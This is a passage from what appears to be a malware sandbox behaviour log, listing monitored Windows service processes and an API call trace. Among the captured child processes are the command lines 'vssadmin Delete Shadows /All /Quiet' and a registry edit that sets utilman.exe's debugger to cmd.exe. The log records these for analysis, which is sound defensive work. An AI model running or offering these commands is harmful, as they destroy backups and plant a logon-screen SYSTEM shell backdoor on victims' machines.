id = 29 os_tid = 0xab4 Thread: id = 30 os_tid = 0xab0 Thread: id = 31 os_tid = 0xbb0 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 32 os_tid = 0x9dc Thread: id = 33 os_tid = 0x9cc Thread: id = 34 os_tid = 0x95c Thread: id = 35 os_tid = 0x490 Thread: id = 36 os_tid = 0x3b4 Thread: id = 37 os_tid = 0x788 Thread: id = 38 os_tid = 0x1c0 Thread: id = 39 os_tid = 0x320 Thread: id = 40 os_tid = 0x6cc Thread: id = 41 os_tid = 0x42c Thread: id = 42 os_tid = 0x1e4 Thread: id = 43 os_tid = 0x760 Thread: id = 44 os_tid = 0x75c Thread: id = 45 os_tid = 0x710 Thread: id = 46 os_tid = 0x6d0 Thread: id = 47 os_tid = 0x6bc Thread: id = 48 os_tid = 0x6b8 Thread: id = 49 os_tid = 0x6b0 Thread: id = 50 os_tid = 0x6a8 Thread: id = 51 os_tid = 0x698 Thread: id = 52 os_tid = 0x684 Thread: id = 53 os_tid = 0x678 Thread: id = 54 os_tid = 0x4a8 Thread: id = 55 os_tid = 0x46c Thread: id = 56 os_tid = 0x44c Thread: id = 57 os_tid = 0x424 Thread: id = 58 os_tid = 0x41c Thread: id = 59 os_tid = 0x404 Thread: id = 60 os_tid = 0x14c Thread: id = 61 os_tid = 0x158 Thread: id = 62 os_tid = 0x3fc Thread: id = 63 os_tid = 0x3f4 Thread: id = 64 os_tid = 0x3e8 Thread: id = 65 os_tid = 0x39c Thread: id = 66 os_tid = 0x390 Thread: id = 67 os_tid = 0x38c Thread: id = 68 os_tid = 0x388 Thread: id = 69 os_tid = 0x37c Thread: id = 70 os_tid = 0x374 Thread: id = 88 os_tid = 0xafc Thread: id = 89 os_tid = 0xaac Thread: id = 90 os_tid = 0xaf8 Thread: id = 121 os_tid = 0x240 Thread: id = 124 os_tid = 0x5a8 Thread: id = 125 os_tid = 0x83c Thread: id = 126 os_tid = 0x88c Thread: id = 127 os_tid = 0x6d8 Thread: id = 128 os_tid = 0x7dc Thread: id = 129 os_tid = 0x5bc Thread: id = 130 os_tid = 0x54c Thread: id = 131 os_tid = 0xa04 Thread: id = 132 os_tid = 0x408 Thread: id = 133 os_tid = 0x7c4 Thread: id = 134 os_tid = 0x5e4 Thread: id = 135 os_tid = 0x5a8 Thread: id = 136 os_tid = 0xaac Thread: id = 137 os_tid = 0x5dc Thread: id = 157 os_tid = 0xa54 Thread: id = 158 os_tid = 0xb1c Thread: id = 189 os_tid = 0x658 Thread: id = 190 os_tid = 0x520 Thread: id = 191 os_tid = 0x52c Thread: id = 192 os_tid = 0x1c0 Thread: id = 210 os_tid = 0x8fc Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5ff6a000" os_pid = "0xa58" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000470f0" [0xc000000f] Thread: id = 71 os_tid = 0x414 Thread: id = 72 os_tid = 0xa80 Thread: id = 73 os_tid = 0xa78 Thread: id = 74 os_tid = 0xa74 Thread: id = 75 os_tid = 0xa70 Thread: id = 76 os_tid = 0xa6c Thread: id = 77 os_tid = 0xa68 Thread: id = 78 os_tid = 0xa60 Thread: id = 79 os_tid = 0xa5c Thread: id = 119 os_tid = 0xb44 Thread: id = 120 os_tid = 0xbc4 Process: id = "8" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61b65000" os_pid = "0xa2c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 80 os_tid = 0x304 Thread: id = 81 os_tid = 0xa4c Thread: id = 82 os_tid = 0xa48 Thread: id = 83 os_tid = 0xa44 Thread: id = 84 os_tid = 0xa40 Thread: id = 85 os_tid = 0xa3c Thread: id = 86 os_tid = 0xa34 Thread: id = 87 os_tid = 0xa30 Thread: id = 138 os_tid = 0x91c Thread: id = 186 os_tid = 0x568 Process: id = "9" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4a3f0000" os_pid = "0xb08" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:000610f1" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 91 os_tid = 0xad0 Thread: id = 92 os_tid = 0xac8 Thread: id = 93 os_tid = 0xac0 [0110.723] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xd9d9c0 | out: lpSystemTimeAsFileTime=0xd9d9c0*(dwLowDateTime=0xa4279c30, dwHighDateTime=0x1d62524)) [0110.723] GetCurrentProcessId () returned 0xb08 [0110.723] GetCurrentThreadId () returned 0xac0 [0110.723] GetTickCount () returned 0x1150761 [0110.723] QueryPerformanceCounter (in: lpPerformanceCount=0xd9d9c8 | out: lpPerformanceCount=0xd9d9c8*=23106632766) returned 1 [0110.724] malloc (_Size=0x100) returned 0x588e80 Thread: id = 94 os_tid = 0xad4 Thread: id = 95 os_tid = 0xabc Thread: id = 96 os_tid = 0xab8 Thread: id = 97 os_tid = 0xa50 Thread: id = 112 os_tid = 0xb60 Thread: id = 122 os_tid = 0x53c Thread: id = 209 os_tid = 0x688 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 98 os_tid = 0x314 Thread: id = 99 os_tid = 0x768 Thread: id = 100 os_tid = 0x764 Thread: id = 101 os_tid = 0x758 Thread: id = 102 os_tid = 0x724 Thread: id = 103 os_tid = 0x718 Thread: id = 104 os_tid = 0x714 Thread: id = 105 os_tid = 0x154 Thread: id = 106 os_tid = 0x150 Thread: id = 107 os_tid = 0x120 Thread: id = 108 os_tid = 0x118 Thread: id = 109 os_tid = 0xf0 Thread: id = 110 os_tid = 0xac4 Thread: id = 111 os_tid = 0xb38 Thread: id = 152 os_tid = 0xbb8 Thread: id = 188 os_tid = 0x88c Thread: id = 193 os_tid = 0x69c Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4bb9d000" os_pid = "0xb74" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0006148e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 113 os_tid = 0xae0 Thread: id = 114 os_tid = 0xb28 Thread: id = 115 os_tid = 0xb64 Thread: id = 116 os_tid = 0xb58 Thread: id = 117 os_tid = 0xb24 Thread: id = 118 os_tid = 0xa18 Thread: id = 123 os_tid = 0x6fc Process: id = "12" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x3da4b000" os_pid = "0x3f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa08" cmd_line = "\"C:\\Windows\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 140 os_tid = 0x30c Thread: id = 141 os_tid = 0x640 Thread: id = 142 os_tid = 0x5b8 Thread: id = 143 os_tid = 0x64 Thread: id = 144 os_tid = 0x7f0 Process: id = "13" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x3f667000" os_pid = "0x6b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa08" cmd_line = "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 146 os_tid = 0x760 [0202.797] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb10 | out: lpSystemTimeAsFileTime=0x1efb10*(dwLowDateTime=0xda0a9000, dwHighDateTime=0x1d62524)) [0202.797] GetCurrentProcessId () returned 0x6b8 [0202.797] GetCurrentThreadId () returned 0x760 [0202.797] GetTickCount () returned 0x1166883 [0202.797] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb18 | out: lpPerformanceCount=0x1efb18*=32313998444) returned 1 [0202.797] GetModuleHandleW (lpModuleName=0x0) returned 0xffef0000 [0202.797] __set_app_type (_Type=0x1) [0202.797] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfff000d0) returned 0x0 [0202.798] __wgetmainargs (in: _Argc=0xfff02140, _Argv=0xfff02150, _Env=0xfff02148, _DoWildCard=0, _StartInfo=0xfff0215c | out: _Argc=0xfff02140, _Argv=0xfff02150, _Env=0xfff02148) returned 0 [0202.798] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0202.799] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0202.800] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x1efae8 | out: phkResult=0x1efae8*=0x0) returned 0x2 [0202.800] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0202.800] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0202.800] GetProcessHeap () returned 0x230000 [0202.800] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x18) returned 0x24b640 [0202.800] lstrlenW (lpString="") returned 0 [0202.800] GetProcessHeap () returned 0x230000 [0202.800] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x2) returned 0x24b660 [0202.800] GetProcessHeap () returned 0x230000 [0202.800] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245a20 [0202.800] GetProcessHeap () returned 0x230000 [0202.800] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x18) returned 0x24b680 [0202.800] GetProcessHeap () returned 0x230000 [0202.800] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245a50 [0202.800] GetProcessHeap () returned 0x230000 [0202.800] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245a80 [0202.800] GetProcessHeap () returned 0x230000 [0202.800] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245ab0 [0202.800] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245ae0 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x18) returned 0x24b6a0 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245b10 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245b40 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245b70 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245ba0 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x18) returned 0x24b6c0 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245bd0 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245c00 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245c30 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x20) returned 0x245c60 [0202.801] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x18) returned 0x24b6e0 [0202.801] _memicmp (_Buf1=0x24b6e0, _Buf2=0xffef1458, _Size=0x7) returned 0 [0202.801] GetProcessHeap () returned 0x230000 [0202.801] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x1e) returned 0x245c90 [0202.801] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0202.802] GetProcessHeap () returned 0x230000 [0202.802] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x18) returned 0x24b700 [0202.802] _memicmp (_Buf1=0x24b700, _Buf2=0xffef1458, _Size=0x7) returned 0 [0202.802] GetProcessHeap () returned 0x230000 [0202.802] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0xbc) returned 0x24b880 [0202.802] _vsnwprintf (in: _Buffer=0x245c90, _BufferCount=0xe, _Format="|%s|", _ArgList=0x1ef8e8 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0202.802] _vsnwprintf (in: _Buffer=0x24b880, _BufferCount=0x5d, _Format="|%s|", _ArgList=0x1ef8e8 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe|") returned 92 [0202.802] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0202.802] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe|") returned 92 [0202.802] SetLastError (dwErrCode=0x490) [0202.802] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0202.802] GetProcessHeap () returned 0x230000 [0202.802] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0xb6) returned 0x24b950 [0202.802] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0202.802] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0202.803] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.803] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0202.804] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0202.804] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0202.804] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0202.804] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.804] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0202.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0202.805] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0202.805] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0202.805] StrChrIW (lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0202.805] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0202.805] GetProcessHeap () returned 0x230000 [0202.806] RtlAllocateHeap (HeapHandle=0x230000, Flags=0xc, Size=0x28) returned 